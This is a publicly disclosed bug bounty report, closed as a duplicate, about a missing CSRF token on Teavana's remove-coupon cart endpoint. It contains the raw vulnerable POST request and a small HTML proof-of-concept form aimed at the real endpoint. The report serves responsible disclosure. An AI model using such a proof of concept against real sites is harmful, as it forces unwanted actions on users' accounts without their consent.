Missing CSRF Token On Remove Coupun From Cart
State Duplicate (Closed)
Disclosed publicly 2019-02-08T19:05:20.751Z
Reported To
Weakness Cross-Site Request Forgery (CSRF)
Bounty
Collapse


Timeline
submitted a report to Starbucks .
2017-05-11T16:03:57.693Z

Hi,
When remove coupun, there's no CSRF token, at this time i use ███████ Coupun to reproduce it.

Vuln Request

POST /on/demandware.store/Sites-Teavana-Site/default/Cart-RemoveCoupon HTTP/1.1
Host: www.teavana.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.teavana.com/us/en/cart
Content-Length: 17
Cookie: some cookie
Connection: close

couponCode=██████████

Poc Code

<html>
<body>
<form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Cart-RemoveCoupon" method="POST">
<input type="hidden" name="couponCode" value="███" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Edit the coupunCode with name of the coupun.

Thanks,
If you need video, i will create one !

Regards,
Frans

  • 0 attachments:
overice Activities::BugDuplicate
2017-05-11T17:27:26.131Z
Hi @apapedulimu, Thank you for your submission. Unfortunately, we had previously been made aware of this issue by another hacker. That being said I will close this as `Duplicate`. Thank you for participating in the Starbucks bug bounty program. We look forward to more reports from you in the future. Best Regards, @overice


apapedulimu Activities::AgreedOnGoingPublic
2017-05-11T17:31:46.852Z


overice Activities::Comment
2017-05-15T16:56:39.094Z
Hi @apapedulimu, Since the original report is still unresolved, we are not ready to disclose this issue. However, we'd be happy to disclose it as soon as the original report reaches resolution. Thank you for your patience! Best Regards, @overice


overice Activities::ChangedScope
2018-11-21T19:54:55.927Z


overice Activities::AgreedOnGoingPublic
2019-02-08T19:05:20.644Z


overice Activities::ReportBecamePublic
2019-02-08T19:05:20.783Z